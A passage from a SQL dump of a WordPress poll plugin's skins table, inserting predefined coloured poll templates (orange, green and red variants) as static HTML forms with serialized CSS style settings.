basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#FB6911";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:7:"#555555";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(11, 'basic', 'Orange V5', 'orange-v5', '', '<div class="basic-yop-poll-container orange-v5" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#FB6911";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#FB6911";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:1:"0";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(12, 'basic', 'Green V1', 'green-v1', '', '<div class="basic-yop-poll-container green-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#3F8B43";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#3F8B43";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(13, 'basic', 'Green V2', 'green-v2', '', '<div class="basic-yop-poll-container green-v2">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button"> Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#ffffff";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(14, 'basic', 'Green V3', 'green-v3', '', '<div class="basic-yop-poll-container green-v3" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#3F8B43";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00');
INSERT INTO `wpou_yoppoll_skins` VALUES
(15, 'basic', 'Green V4', 'green-v4', '', '<div class="basic-yop-poll-container green-v4" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text"> Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#3F8B43";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(16, 'basic', 'Green V5', 'green-v5', '', '<div class="basic-yop-poll-container green-v5" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#3F8B43";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#3F8B43";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(17, 'basic', 'Red V1', 'red-v1', '', '<div class="basic-yop-poll-container red-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#B70004";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#B70004";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(18, 'basic', 'Red V2', 'red-v2', '', '<div class="basic-yop-poll-container red-v2">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#ffffff";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:230:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}\n								.basic-yop-poll-container[data-uid] .basic-question-title h5 {\n									background-color: #B70004;\n									padding: 5px 0;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(19, 'basic', 'Red V3', 'red-v3', '', '<div class="basic-yop-poll-container red-v3" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input 